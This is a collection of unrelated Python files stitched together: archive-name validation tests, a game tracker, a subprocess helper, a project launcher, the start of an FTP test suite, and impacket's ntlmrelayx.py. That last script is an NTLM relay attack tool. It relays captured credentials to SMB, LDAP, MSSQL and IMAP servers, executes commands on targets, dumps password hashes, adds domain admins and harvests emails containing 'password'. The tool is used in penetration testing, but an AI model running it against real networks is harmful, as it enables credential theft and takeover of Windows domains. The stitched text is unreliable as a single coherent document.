# We cannot easily test `archive_member_validator` so let's test
# `_validate_archive_member_name_and_size` instead.
def test_raises_when_filename_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(None, 123)
def test_raises_when_filesize_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('filename', None)
def test_raises_when_filename_is_dot_dot_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('../', 123)
def test_raises_when_filename_starts_with_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('/..', 123)
def test_raises_when_filename_is_dot_dot(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('..', 123)
def test_does_not_raise_when_filename_is_dot_dot_extension(self):
utils._validate_archive_member_name_and_size('foo..svg', 123)
@override_settings(FILE_UNZIP_SIZE_LIMIT=100)
def test_raises_when_filesize_is_above_limit(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(
'filename', settings.FILE_UNZIP_SIZE_LIMIT + 100
)
class TestWriteCrxAsXpi(TestCase):
def setUp(self):
self.tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
self.target = os.path.join(self.tempdir, 'target')
self.prefix = 'src/olympia/files/fixtures/files'
def tearDown(self):
storage.delete(self.target)
storage.delete(self.tempdir)
# Note: those tests are also performed in test_models.py using
# FileUpload.from_post() to ensure the relevant exception is caught if they
# are raised and the add-on is then fully processed correctly. These just
# test the underlying function that does the conversion from crx to xpi.
def test_webextension_crx(self):
path = os.path.join(self.prefix, 'webextension.crx')
with open(path, 'rb') as source:
utils.write_crx_as_xpi(source, self.target)
assert zipfile.is_zipfile(self.target)
def test_webextension_crx_large(self):
path = os.path.join(self.prefix, 'https-everywhere.crx')
with open(path, 'rb') as source:
utils.write_crx_as_xpi(source, self.target)
assert zipfile.is_zipfile(self.target)
def test_webextension_crx_version_3(self):
path = os.path.join(self.prefix, 'webextension_crx3.crx')
with open(path, 'rb') as source:
utils.write_crx_as_xpi(source, self.target)
assert zipfile.is_zipfile(self.target)
def test_webextension_crx_not_a_crx(self):
file_ = SimpleUploadedFile(
'foo.crx', b'Cr42\x02\x00\x00\x00&\x01\x00\x00\x00\x01\x00\x00'
)
with self.assertRaises(utils.InvalidOrUnsupportedCrx) as exc:
utils.write_crx_as_xpi(file_, self.target)
assert str(exc.exception) == 'CRX file does not start with Cr24'
        # It's the caller's responsibility to move the original file there, as
        # if it were a regular zip, since we couldn't convert it.
assert not storage.exists(self.target)
def test_webextension_crx_version_unsupported(self):
file_ = SimpleUploadedFile(
'foo.crx', b'Cr24\x04\x00\x00\x00&\x01\x00\x00\x00\x01\x00\x00'
)
with self.assertRaises(utils.InvalidOrUnsupportedCrx) as exc:
utils.write_crx_as_xpi(file_, self.target)
assert str(exc.exception) == 'Unsupported CRX version'
        # It's the caller's responsibility to move the original file there, as
        # if it were a regular zip, since we couldn't convert it.
assert not storage.exists(self.target)
def test_webextension_crx_version_cant_unpack(self):
file_ = SimpleUploadedFile(
'foo.crx', b'Cr24\x02\x00\x00\x00&\x00\x00\x00\x01\x00\x00'
)
with self.assertRaises(utils.InvalidOrUnsupportedCrx) as exc:
utils.write_crx_as_xpi(file_, self.target)
assert str(exc.exception) == 'Invalid or corrupt CRX file'
        # It's the caller's responsibility to move the original file there, as
        # if it were a regular zip, since we couldn't convert it.
assert not storage.exists(self.target)
|
ntlmrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Generic NTLM Relay Module
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It is supposed to work at any LM compatibility level. The only way
# to stop this attack is to enforce SPN checks and/or signing on the server.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setRaw(options.raw)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setInterfaceIp(options.interface_ip)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
#SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
        if isinstance(thread, tuple(RELAY_SERVERS)):  # isinstance() needs a tuple of types, not a list
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help='Target to relay the credentials to, '
                        'can be an IP, hostname or URL like smb://server:445. If unspecified, it will relay back to the client')
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
    parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient console instead '
                        'of executing a command after a successful relay. This console will listen locally on a '
                        'TCP port and can be reached with, for example, netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_mutually_exclusive_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support (experimental!)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store',help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file.')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
'directory).')
smboptions.add_argument('--raw', action='store_true', help='Executes the raw supplied command without first saving it as a batch file. (No output)')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
    mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute '
                              '(can specify multiple)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store_true', required=False, help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
tracker.py
|
import multiprocessing
from tft import utils
class Tracker:
def __init__(self, players, file_name=None):
self.__unitLookupTable = initialize_unit_lookup_table()
manager = multiprocessing.Manager()
self.__stages = manager.dict()
self.__current_stage = "0-0"
self.__players = players
self.__file_name = file_name
if file_name:
utils.create_json_array_file(self.__file_name)
ctx = multiprocessing.get_context('spawn')
self.__entry_queue = ctx.SimpleQueue()
self.__process = ctx.Process(target=self.addEntries)
def track(self):
self.__process.start()
def getEntryQueue(self):
return self.__entry_queue
def getStages(self):
return self.__stages
def writeToFile(self):
self.__entry_queue.put({"mode": "finish", "contents": {"stage": "0-0"}})
self.__process.join()
print("Attempting to save to file ...")
print(self.__stages.copy())
if self.__file_name:
print("Saving to file")
utils.append_to_json_array_file(self.__file_name, self.__stages.copy())
def hasStageChanged(self, stage):
"""
Determines whether or not the stage has changed.
If the stage has changed, the current stage is updated
:param stage: string with format (x-y)
:return: boolean
"""
result = self.__current_stage != stage
if result:
self.__current_stage = stage
self.createStageIfNeeded(stage)
return result
def addEntries(self):
while True:
data = self.__entry_queue.get()
stage = data["contents"]["stage"]
if stage == "0-0":
break
timestamp = data["timestamp"]
self.createStageIfNeeded(stage)
if data["mode"] == "shop":
units = data["contents"]["units"]
level = data["contents"]["level"]
gold = data["contents"]["gold"]
self.addShop(stage, units, level, gold, timestamp)
elif data["mode"] == "healthbars":
healthbars = data["contents"]["healthbars"]
self.addHealthbars(stage, healthbars, timestamp)
    def addHealthbars(self, stage, healthbars, timestamp):
        """
        Add a snapshot of player healthbars for the given stage.
        :param stage: string with format (x-y)
        :param healthbars: iterable of (player name, health) pairs
        :param timestamp: currently unused
        """
players = {}
for player, health in healthbars:
matched_player = utils.find_matching_string_in_list(player, self.__players, 70)
if matched_player == "" and player.isdigit():
players[""] = player
players[matched_player] = health
temp_dict = self.__stages[stage].copy()
temp_dict["players"].append(players)
self.__stages[stage] = temp_dict
def addShop(self, stage, units, level, gold, timestamp=0):
"""
        Add a shop to the tracker if it has not already been added, along with the current level and gold amount.
:param stage:
:param units: list of un-processed units
:param level:
:param gold:
:param timestamp:
        :return: None
"""
units = [utils.find_matching_string_in_list(i, self.__unitLookupTable, 75) for i in units]
shop = _create_shop(units, level, gold, timestamp)
temp_dict = self.__stages[stage].copy()
temp_dict["shops"].append(shop)
self.__stages[stage] = temp_dict
def createStageIfNeeded(self, stage):
if stage in self.__stages:
return
self.__stages[stage] = {"shops": [], "players": []}
def _create_shop(units, level, gold, timestamp):
return {"units": units, "level": level, "gold": gold, "timestamp": timestamp}
def initialize_unit_lookup_table():
"""
    Initialize the unit lookup table using the champion json file provided by Riot (supports Set 2, 3 and 4)
:return:
"""
unit_lookup_table = []
json = utils.open_json_file("data/champions_set4.json")
for unit in json:
key = "name" # Set 3/4 key
if key not in unit:
key = "champion" # Set 2 key
unit_lookup_table.append(unit[key])
return unit_lookup_table
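# Illustrative usage sketch of the Tracker above (player names, stage, shop
# contents, gold/level values and the file name are all placeholders):
#   tracker = Tracker(players=["Alice", "Bob"], file_name="game.json")
#   tracker.track()
#   tracker.getEntryQueue().put({
#       "mode": "shop",
#       "timestamp": 12.3,
#       "contents": {"stage": "2-1", "units": ["Garen"], "level": 4, "gold": 12},
#   })
#   tracker.writeToFile()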
|
command.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2007-2013, GoodData(R) Corporation. All rights reserved
"""
Module for various command executions
"""
import subprocess
import threading
import os
import psutil
import atexit
import datetime
import logging
import time
lg = logging.getLogger(__name__)
def execute(command, timeout=None, **kwargs):
"""
Execute command, wrapper for Command class
:param command: list for non-shell execution, string for shell execution
:param timeout: timeout in seconds
:param kwargs: keyword arguments to pass to subprocess.Popen
:rtype: tuple (stdout, stderr, retval)
"""
cmd = Command(command, **kwargs)
return cmd.run(timeout)
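# Illustrative use of the execute() wrapper above (the command strings and the
# timeout value are placeholders):
#   stdout, stderr, retval = execute('ls -l /tmp', timeout=10)   # string -> shell execution
#   stdout, stderr, retval = execute(['/bin/echo', 'hello'])     # list   -> non-shell execution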
def signal_ptree(pid, signal=15):
"""
Send signal to whole process tree
By default send SIGTERM (15).
If process doesn't exist, just pass
:param pid: process id
:param signal: signal number, send SIGTERM (15) by default
"""
try:
process = psutil.Process(pid)
except psutil.NoSuchProcess:
# Process could be already dead, just skip killing children
return
# Get children process tree (psutil 0.4.1 doesn't support recursive=True)
children = get_ptree(process)
lg.info('Sending signal to process tree: signal=%s pid=%s process=%s children=%s' % (signal, process.pid, process.name, len(children)))
if children:
        # Children have to be listed from bottom to top
for child in children:
try:
lg.info('Sending signal to child process: signal=%s pid=%s process=%s' % (signal, child.pid, child.name))
os.kill(child.pid, signal)
except OSError as e:
if e.errno == 3:
# No such process - it's ok, it could be dead already
lg.debug('Children process does not exist: pid=%s process=%s' % (child.pid, child.name))
continue
# Kill parent
try:
lg.info('Sending signal to parent process: signal=%s pid=%s process=%s' % (signal, process.pid, process.name))
os.kill(process.pid, signal)
except OSError as e:
if e.errno == 3:
            # No such process - it's ok, it could die with its children
lg.debug('Parent process does not exist: pid=%s process=%s' % (process.pid, process.name))
pass
def get_ptree(process):
"""
Get process children recursive.
    Used for compatibility with psutil 0.4.1; newer versions support the recursive=True parameter.
Given process isn't included in returned list.
Process tree list is reversed, so first are children from bottom to top.
:param process: psutil.Process instance or uid
:rtype: list (psutil.Process)
"""
if not isinstance(process, psutil.Process):
process = psutil.Process(process)
result = []
children = process.get_children()
if children:
for child in children:
if child.get_children():
result.extend(get_ptree(child))
result.append(child)
else:
result.append(child)
return result
def _proc_cleanup(pid):
"""
Try to cleanup process tree
:param pid: process id
"""
if pid:
try:
process = psutil.Process(pid)
except psutil.NoSuchProcess:
return
signal_ptree(process)
if process.is_running():
# Still running - wait 1 second before sending SIGKILL
time.sleep(1)
signal_ptree(process, 9)
def _register_cleanup(pid):
"""
Register cleanup function for given process id
:param pid: process id
"""
lg.debug("Registering cleanup for pid %s" % pid)
atexit.register(_proc_cleanup, pid)
def _unregister_cleanup(pid):
"""
Unregister cleanup function for given process id
:param pid: process id
"""
lg.debug("Unregistering cleanup for pid %s" % pid)
# Newer atexit has unregister, but we want to be compatible
for handler in atexit._exithandlers:
(func, args, kwargs) = handler
if func == _proc_cleanup and args == (pid,):
atexit._exithandlers.remove(handler)
class Command(object):
"""
Class for command executions
"""
def __init__(self, command, **kwargs):
"""
Initialize instance
:param command: list for non-shell execution, string for shell execution
:param kwargs: keyword arguments to pass to subprocess.Popen
"""
self.command = command
self.process = None
self.stdout = None
self.stderr = None
self.returncode = None
self._exception = None
# Default arguments
popen_args = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'bufsize': 0
}
# We want to pass shell=True argument if we have string command
if isinstance(command, basestring):
popen_args['shell'] = True
# Merge our arguments and supplied ones in kwargs
self.kwargs = dict(popen_args, **kwargs)
def __repr__(self):
"""
Instance name
"""
return '<Command \'%s\'>' % self.command
def run(self, timeout=None, timeout_sigterm=3, timeout_sigkill=5):
"""
Run command with given timeout.
Return tuple of stdout, stderr strings and retval integer.
:param timeout: if command doesn't exit in given timeout, kill the process (default no timeout)
:param timeout_sigterm: wait approximately given seconds after sending SIGTERM before sending SIGKILL (default 3)
:param timeout_sigkill: wait approximately given seconds after sending SIGKILL before considering thread as deadlocked (default 5)
:rtype: tuple (stdout, stderr, retval)
"""
def target():
"""
Thread target function
"""
try:
self.process = subprocess.Popen(self.command, **self.kwargs)
# Register cleanup function to avoid running processes after program exit
_register_cleanup(self.process.pid)
self.stdout, self.stderr = self.process.communicate()
# Remove unwanted leading/trailing whitespaces from output
# Force stdout/stderr to be string if it's empty
self.stdout = self.stdout.strip() if self.stdout else ''
self.stderr = self.stderr.strip() if self.stderr else ''
self.returncode = self.process.returncode
except Exception as e:
self._exception = e
return e
# Run thread with command and wait
thread = threading.Thread(target=target)
lg.debug("Executing command: command='%s' %s"
% (self.command, ' '.join('%s=%s' % (a, b) for a, b in self.kwargs.iteritems())))
time_start = datetime.datetime.now()
thread.start()
if timeout:
thread.join(timeout)
# Thread still alive? Timeout!
if thread.is_alive():
                # Terminate the process tree and wait timeout_sigterm seconds before escalating
signal_ptree(self.process.pid)
thread.join(timeout_sigterm)
if thread.is_alive():
# Thread still alive -> send SIGKILL
signal_ptree(self.process.pid, signal=9)
thread.join(timeout_sigkill)
if thread.is_alive():
# Thread still alive -> deadlock
                        # Unregister the cleanup function in case the process eventually dies, to avoid killing a re-used PID
_unregister_cleanup(self.process.pid)
raise ThreadDeadlock("Process %s deadlocked thread %s" % (self.process.pid, thread.name))
                # Process is not running, unregister cleanup and raise Timeout exception
_unregister_cleanup(self.process.pid)
raise ExecutionTimeout("Execution timeout after %s seconds" % timeout)
else:
# No timeout applied.. only insane people should do this.
thread.join()
# Handle exception from thread
if self._exception:
# It means that process is not running, so unregister cleanup and re-raise exception
_unregister_cleanup(self.process.pid)
raise self._exception
lg.debug("Command execution done: time=%s returncode=%s" %
((datetime.datetime.now() - time_start).seconds, self.returncode))
        # We are successfully done, unregister cleanup to avoid killing a re-used PID upon server shutdown
_unregister_cleanup(self.process.pid)
return (self.stdout, self.stderr, self.returncode)
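# Illustrative timeout handling with Command.run() (the command and timeout
# values are placeholders): a process that outlives the timeout is sent SIGTERM,
# then SIGKILL, and ExecutionTimeout is raised once its tree has been signalled;
# ThreadDeadlock is raised only if the process cannot be killed at all.
#   try:
#       Command('sleep 60').run(timeout=5, timeout_sigterm=3, timeout_sigkill=5)
#   except ExecutionTimeout:
#       pass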
## Exceptions
class ExecutionTimeout(Exception):
"""
    Raised when a command does not finish within the given timeout
"""
pass
class ThreadDeadlock(Exception):
"""
Process can't be killed, caused deadlock of executing thread
"""
pass
|
Project_Selector.py
|
#! python3.7
from git import Repo
from threading import Thread
import os
import subprocess
project_dictionary = {}
def get_project_name(project_directory="D:\\Code"):
"""
:param project_directory: Project Directory
Build a dictionary of all projects - consisting of {Project Name : Project Directory Path}
:return: The Full Project Dictionary
"""
return_dictionary = {}
project_names = os.listdir(project_directory)
for name in project_names:
return_dictionary[name] = os.path.join(project_directory, name)
return return_dictionary
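# Illustrative result of get_project_name() (the directory and project names
# are placeholders):
#   get_project_name("D:\\Code")
#   -> {"project_a": "D:\\Code\\project_a", "project_b": "D:\\Code\\project_b"}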
def enter_project_name():
"""
No Input params
Get project name from user
:return: the absolute project directory for that project
"""
# function which will take in a project name and direct the system to
# the associated folder
while True:
name_entry = input("Please enter project you wish to work on: ")
try:
return project_dictionary[name_entry]
except KeyError:
list_projects()
def list_projects():
"""
Print a list of all available projects
:return: None
"""
print("Available Projects are: ")
for p in project_dictionary:
print(p)
def checkout_branch():
"""
Search for a list of all branches for a given project
Ask User which branch they want
And check that branch out
:return: None
"""
# function to provide all the available local branches
r = Repo()
repo_heads = r.heads
head_names = [h.name for h in repo_heads]
if len(head_names) == 1:
print(f"Only the {head_names[0]} branch exists - checking it out")
return repo_heads[head_names[0]].checkout()
else:
while True:
print("Available branches are: ")
for h in head_names:
print(h)
branch = input("Enter branch you want to work on: ")
try:
repo_heads[branch].checkout()
break
except KeyError:
print("Invalid Branch - input is case-sensitive")
def ide_opener():
"""
Open the git bash terminal
Check if User wants an IDE open, and open it for them
:return: None
"""
# t = Thread(target=lambda: subprocess.call("D:\\Git\\git-bash.exe"))
# t.start()
loop = True
while loop:
ide_checker = input("Do you want to open an IDE? ")
        if ide_checker.upper() == 'N':
            break
        else:
            which_ide = input(
                "Do you want to open (A)tom, (P)ycharm, (I)ntellij or (V)sCode? ")
            if which_ide.upper() not in ('A', 'P', 'I', 'V'):
                print("Please try again")
            elif which_ide.upper() == 'A':
                os.system("Atom .")  # Open Atom to the current Directory
                break
            elif which_ide.upper() == 'P':
                os.system("pycharm .")
                break
            elif which_ide.upper() == 'I':
                # Assumes the IntelliJ command-line launcher ("idea") is on the PATH
                os.system("idea .")
                break
            elif which_ide.upper() == 'V':
                os.system("code .")
                break
return None
if __name__ == "__main__":
project_dictionary = get_project_name()
if len(project_dictionary) > 1:
list_projects()
else:
        project_key = next(iter(project_dictionary))
        print(f"Only Project {project_key} exists")
os.chdir(enter_project_name()) # change directory to project folder
checkout_branch()
ide_opener()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
TIMEOUT = 3
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
